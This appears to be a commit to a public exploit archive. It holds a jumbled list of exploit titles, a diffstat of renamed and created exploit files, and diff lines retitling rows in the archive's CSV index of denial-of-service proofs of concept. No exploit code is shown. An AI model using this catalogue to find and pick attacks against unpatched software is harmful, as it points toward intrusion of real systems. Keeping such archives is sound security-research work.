- Interleaving 'document.write' / 'appendChild' Remote Overflow Microsoft Data Access Components - Overflow (PoC) (MS11-002) Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002) Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit) Veritas Backup Exec Name Service - Overflow (Metasploit) Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) Veritas Backup Exec Name Service - Remote Overflow (Metasploit) Microsoft Private Communications Transport - Overflow (MS04-011) (Metasploit) Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit) Microsoft RRAS Service - Overflow (MS06-025) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' Overflow 'SMB' (MS07-029) (Metasploit) Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit) Microsoft NetDDE Service - Overflow (MS04-031) (Metasploit) Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit) CA BrightStor Agent for Microsoft SQL - Overflow (Metasploit) CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit) CA BrightStor Universal Agent - Overflow (Metasploit) CA BrightStor Universal Agent - Remote Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit) Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit) Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit) freeFTPd 1.0 - 'Username' Overflow (Metasploit) freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit) War-FTPD 1.65 - 'Username' Overflow (Metasploit) War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit) Microsoft RPC DCOM Interface - Overflow (MS03-026) (Metasploit) Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit) MaxDB WebDBM - 'Database' Overflow (Metasploit) MaxDB WebDBM - 'Database' Remote Overflow (Metasploit) Savant Web Server 3.1 - Overflow (Metasploit) Savant Web Server 3.1 - Remote Overflow (Metasploit) McAfee ePolicy Orchestrator / ProtectionPilot - Overflow (Metasploit) McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit) Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit) Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (OSX) - Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit) Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit) Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) Samba 2.2.8 (BSD x86) - 'trans2open' Overflow (Metasploit) Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) Progea Movicon 11 - 'TCPUploadServer' Remote Progea Movicon 11 - 'TCPUploadServer' Remote File System Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit) Easy File Sharing HTTP Server 7.2 - Remote Overflow (SEH) (Metasploit) Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow JBoss AS 2.0 - Remote JBoss AS 2.0 - Remote Command Execution WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter) WorldMail IMAPd 3.0 - Remote Overflow (SEH) (Egghunter) HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit) HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit) Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow Adobe Flash Player - '.mp4 cprt' Overflow (Metasploit) Apache Tomcat - Account Scanner / 'PUT' Request Remote Adobe Flash Player - '.mp4 cprt' Remote Overflow (Metasploit) Apache Tomcat - Account Scanner / 'PUT' Request Command Execution McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution IRIX 6.4 - 'pfdisplay.cgi' IRIX 6.4 - 'pfdisplay.cgi' Code Execution SGI IRIX 6.3 - cgi-bin 'webdist.cgi' SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets' Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Remote Overflow ALLMediaServer 0.8 - Overflow (SEH) ALLMediaServer 0.8 - Remote Overflow (SEH) S.u.S.E. Linux 6.3/6.4 - Installed Package Disclosure SuSE Linux 6.3/6.4 - Installed Package Disclosure Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Remote File Upload Samhain Labs 1.x - HSFTP Remote Format String GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Remote Overflow IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit) IBM Cognos - 'tm1admsd.exe' Remote Overflow (Metasploit) Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray Plesk < 9.5.4 - Remote Plesk < 9.5.4 - Remote Command Execution Microsoft PowerPoint 2003 - 'powerpnt.exe' Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow HP LoadRunner - 'magentproc.exe' Overflow (Metasploit) HP LoadRunner - 'magentproc.exe' Remote Overflow (Metasploit) ImgSvr 0.6 - 'Template' Local File Inclusion Nginx 1.4.0 (Generic Linux x64) - Remote Nginx 1.4.0 (Generic Linux x64) - Remote Overflow Easy Internet Sharing Proxy Server 2.2 - Overflow (SEH) (Metasploit) Easy Internet Sharing Proxy Server 2.2 - Remote Overflow (SEH) (Metasploit) Oracle 9i/10g Database - Network Foundation Remote Oracle 9i/10g Database - Network Foundation Remote Overflow Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection Yaws 1.55 - 'Logs' Terminal Escape Sequence Command Injection Plesk Server Administrator (PSA) - 'locale' Local File Inclusion VSAT Sailor 900 - Remote VSAT Sailor 900 - Remote Overflow Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH) Easy File Sharing Web Server 7.2 - Remote Overflow (Egghunter) (SEH) TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit) Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote PHP-Nuke 6.9 - 'cid' SQL Injection Remote phpBB 2.0.6 - 'search_id' SQL Injection / MD5 Hash PHP-Nuke 6.9 - 'cid' SQL Injection AWStats 5.0 < 6.3 - Input Validation Hole in 'logfile' AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote phpBB - highlight Arbitrary File Upload 'Santy.A' PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Information Leak phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload e107 - 'include()' Remote e107 - 'include()' Remote File Upload phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm' phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista PostNuke PostWrap Module - Remote PostNuke PostWrap Module - Remote File Inclusion / Code Execution phpBB 2.0.13 - 'downloads.php' mod Remote phpBB 2.0.13 - 'Calendar Pro' mod Remote phpBB 2.0.13 - 'downloads.php' mod Get Hash phpBB 2.0.13 - 'Calendar Pro' mod Get Hash PhotoPost - Arbitrary Data Remote PhotoPost - Arbitrary Data Hash eXtropia Shopping Cart - 'web_store.cgi' Remote Mambo 4.5.2.1 - Fetch Password Hash Remote eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution Mambo 4.5.2.1 - Fetch Password Hash Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution vuBB 0.2 - 'cookie' Final SQL Injection 'mq=off' vuBB 0.2 Final - 'cookie' SQL Injection JiRos Banner Experience 1.0 - Create Authentication Bypass Remote JiRos Banner Experience 1.0 - Unauthorised Create Admin phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Sugar Suite Open Source 4.2 - 'OptimisticLock' Remote phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution DeluxeBB 1.06 - 'Attachment mod_mime' Remote DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution Drupal 4.7 - 'Attachment mod_mime' Remote Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Local File Inclusion Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote Command Execution phpBB 2.0.21 - Poison Null Byte Remote phpBB 2.0.21 - Poison Null Byte Remote File Upload PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()' PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Command Execution Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote Philex 0.2.3 - Remote File Inclusion / File Disclosure MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2) LoveCMS 1.6.2 Final - Update Settings Remote LoveCMS 1.6.2 Final - Update Settings addalink 4 Beta - Write Approved Links Remote addalink 4 Beta - Write Approved Links The Rat CMS Alpha 2 - 'download.php' Remote The Rat CMS Alpha 2 - 'download.php' Priviledge Escalation Graugon Forum 1 - 'id' Command Injection 'via SQL Injection' Graugon Forum 1 - 'id' Command Injection / SQL Injection Coppermine Photo Gallery 1.4.22 - Remote Coppermine Photo Gallery 1.4.22 - SQL Injection Barracuda IMFirewall 620 - Barracuda IMFirewall 620 - Multiple Vulnerabilities Barracuda Web Firewall 660 Firmware 7.3.1.007 - Barracuda Web Firewall 660 Firmware 7.3.1.007 - Multiple Vulnerabilities CakePHP 1.3.5/1.2.8 - 'Unserialize()' CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution WordPress Plugin Akismet 2.1.3 - WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting ImgSvr 0.6 - 'Template' Local File Inclusion Plesk Server Administrator (PSA) - 'locale' Local File Inclusion Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting --- files.csv | 603 +++++++++--------- platforms/aix/{dos => local}/19045.txt | 0 platforms/hardware/dos/43164.py | 23 + platforms/hardware/webapps/43158.txt | 46 ++ platforms/irix/local/19273.sh | 11 +- platforms/irix/local/19310.c | 4 +- platforms/irix/local/19706.sh | 8 +- platforms/linux/{remote => dos}/38.pl | 0 platforms/linux/local/19254.c | 2 + platforms/linux/local/19565.sh | 11 +- platforms/linux/local/19900.c | 2 + platforms/linux/local/23154.c | 2 + platforms/linux/{remote => local}/405.c | 0 platforms/linux/{local => remote}/23740.c | 2 + platforms/linux/{remote => webapps}/30286.txt | 0 platforms/linux/{remote => webapps}/6026.pl | 0 platforms/multiple/dos/43166.js | 213 +++++++ platforms/multiple/dos/43167.js | 210 ++++++ platforms/multiple/dos/43168.js | 218 +++++++ platforms/multiple/dos/43169.js | 164 +++++ platforms/multiple/dos/43170.js | 178 ++++++ platforms/multiple/dos/43171.js | 149 +++++ platforms/multiple/dos/43172.js | 152 +++++ platforms/multiple/dos/43173.html | 162 +++++ platforms/multiple/dos/43174.html | 168 +++++ platforms/multiple/dos/43175.html | 214 +++++++ platforms/multiple/dos/43176.html | 194 ++++++ platforms/multiple/local/19498.sh | 11 +- .../multiple/{remote => webapps}/34136.txt | 0 platforms/osx/local/29950.js | 2 - platforms/osx/{remote => local}/758.c | 0 platforms/osx/remote/1265.pl | 1 + platforms/php/webapps/2348.pl | 2 +- platforms/php/webapps/30036.html | 5 +- platforms/sco/local/23141.sh | 8 +- platforms/solaris/{local => dos}/15245.txt | 0 platforms/solaris/{local => dos}/19161.txt | 0 platforms/windows/{local => dos}/403.c | 0 platforms/windows/{remote => dos}/9815.py | 0 platforms/windows/{remote => dos}/9817.py | 0 platforms/windows/{dos => local}/11987.txt | 0 platforms/windows/local/12012.txt | 3 +- platforms/windows/local/19220.c | 2 + platforms/windows/{remote => local}/2821.c | 0 platforms/windows/remote/11420.py | 3 +- platforms/windows/remote/17977.txt | 3 +- platforms/windows/remote/20459.html | 2 + platforms/windows/remote/28225.c | 6 +- 48 files changed, 2452 insertions(+), 332 deletions(-) rename platforms/aix/{dos => local}/19045.txt (100%) create mode 100755 platforms/hardware/dos/43164.py create mode 100644 platforms/hardware/webapps/43158.txt rename platforms/linux/{remote => dos}/38.pl (100%) rename platforms/linux/{remote => local}/405.c (100%) rename platforms/linux/{local => remote}/23740.c (96%) rename platforms/linux/{remote => webapps}/30286.txt (100%) rename platforms/linux/{remote => webapps}/6026.pl (100%) create mode 100644 platforms/multiple/dos/43166.js create mode 100644 platforms/multiple/dos/43167.js create mode 100644 platforms/multiple/dos/43168.js create mode 100644 platforms/multiple/dos/43169.js create mode 100644 platforms/multiple/dos/43170.js create mode 100644 platforms/multiple/dos/43171.js create mode 100644 platforms/multiple/dos/43172.js create mode 100644 platforms/multiple/dos/43173.html create mode 100644 platforms/multiple/dos/43174.html create mode 100644 platforms/multiple/dos/43175.html create mode 100644 platforms/multiple/dos/43176.html rename platforms/multiple/{remote => webapps}/34136.txt (100%) rename platforms/osx/{remote => local}/758.c (100%) rename platforms/solaris/{local => dos}/15245.txt (100%) rename platforms/solaris/{local => dos}/19161.txt (100%) rename platforms/windows/{local => dos}/403.c (100%) rename platforms/windows/{remote => dos}/9815.py (100%) rename platforms/windows/{remote => dos}/9817.py (100%) rename platforms/windows/{dos => local}/11987.txt (100%) rename platforms/windows/{remote => local}/2821.c (100%) diff --git a/files.csv b/files.csv index 07919e4c8..1487663ab 100644 --- a/files.csv +++ b/files.csv @@ -6,6 +6,7 @@ id,file,description,date,author,platform,type,port 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service (PoC)",2003-04-29,aT4r,windows,dos,0 35,platforms/windows/dos/35.c,"Microsoft IIS 5.0 < 5.1 - Remote Denial of Service",2003-05-31,Shachank,windows,dos,0 +38,platforms/linux/dos/38.pl,"Apache 2.0.45 - 'APR' Crash",2003-06-08,"Matthew Murphy",linux,dos,80 59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0 @@ -64,6 +65,7 @@ id,file,description,date,author,platform,type,port 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 385,platforms/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos,0 +403,platforms/windows/dos/403.c,"IPD (Integrity Protection Driver) - Denial of Service",2004-08-18,anonymous,windows,dos,0 419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service Vulnerabilities",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 422,platforms/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service",2004-08-27,"Luigi Auriemma",windows,dos,0 @@ -654,7 +656,7 @@ id,file,description,date,author,platform,type,port 4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service (PoC)",2007-10-23,ShadowHatesYou,multiple,dos,0 4569,platforms/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service",2007-10-27,"Nice Name Crew",windows,dos,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,linux,dos,0 -4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos,0 +4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 - DHCPd Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos,0 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - 'Alter' Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 @@ -1222,6 +1224,8 @@ id,file,description,date,author,platform,type,port 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation (PoC)",2009-09-29,pyrokinesis,windows,dos,0 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,windows,dos,21 9814,platforms/windows/dos/9814.py,"CDBurnerXP 4.2.4.1351 - Local Crash (Denial of Service)",2009-09-25,Dr_IDE,windows,dos,0 +9815,platforms/windows/dos/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,dos,0 +9817,platforms/windows/dos/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,dos,0 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0 9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 @@ -1462,7 +1466,6 @@ id,file,description,date,author,platform,type,port 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 -11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 @@ -1748,6 +1751,7 @@ id,file,description,date,author,platform,type,port 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0 15242,platforms/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0 15243,platforms/windows/dos/15243.html,"Oracle Java - APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos,0 +15245,platforms/solaris/dos/15245.txt,"Oracle Solaris - 'su' Crash",2010-10-13,prdelka,solaris,dos,0 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,windows,dos,0 15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",windows,dos,0 @@ -2223,7 +2227,6 @@ id,file,description,date,author,platform,type,port 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0 -19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",hardware,dos,0 @@ -2241,6 +2244,7 @@ id,file,description,date,author,platform,type,port 19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 +19161,platforms/solaris/dos/19161.txt,"Solaris 2.5.1 - 'Ping' System Panic (Denial of Service)",1997-06-15,"Adam Caldwell",solaris,dos,0 19181,platforms/windows/dos/19181.txt,"XnView - '.RAS' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19182,platforms/windows/dos/19182.txt,"XnView - '.ECW' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19183,platforms/windows/dos/19183.txt,"XnView - '.FlashPix' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 @@ -2253,8 +2257,8 @@ id,file,description,date,author,platform,type,port 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0 19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - Denial of Service Duplicate Hostname",1999-06-04,"Carl Byington",windows,dos,0 -19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1) - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 -19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0/2.1/2.2 - 'autofs'",1999-02-19,"Brian Jones",linux,dos,0 +19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / SuSE Linux 6.1) - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 +19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service",1999-02-19,"Brian Jones",linux,dos,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 - '.m3u' Crash (PoC)",2012-06-18,0dem,windows,dos,0 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",linux,dos,0 19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service)",1999-01-26,"Dan Burcaw",linux,dos,0 @@ -2298,7 +2302,7 @@ id,file,description,date,author,platform,type,port 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - 'RFSync 1.0.0.1' Crash (PoC)",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service",1999-08-11,"Nobuo Miwa",multiple,dos,0 -19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service",1999-08-16,friedolin,linux,dos,0 +19463,platforms/linux/dos/19463.c,"SuSE Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service",1999-08-16,friedolin,linux,dos,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",windows,dos,0 19477,platforms/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service",1999-08-31,anonymous,hardware,dos,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0 @@ -4578,7 +4582,7 @@ id,file,description,date,author,platform,type,port 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash (PoC)",2015-06-23,HexTitan,windows,dos,0 -37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize'",2015-06-23,"Francis Provencher",windows,dos,0 +37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' (Denial of Service)",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 @@ -4658,7 +4662,7 @@ id,file,description,date,author,platform,type,port 37861,platforms/windows/dos/37861.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 37862,platforms/windows/dos/37862.txt,"Adobe Flash - Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos,0 37863,platforms/multiple/dos/37863.txt,"Adobe Flash - scale9Grid Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 -37864,platforms/multiple/dos/37864.txt,"Adobe Flash - Use-After-Free in Drawing Methods 'this'",2015-08-19,"Google Security Research",multiple,dos,0 +37864,platforms/multiple/dos/37864.txt,"Adobe Flash - Drawing Methods 'this' Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 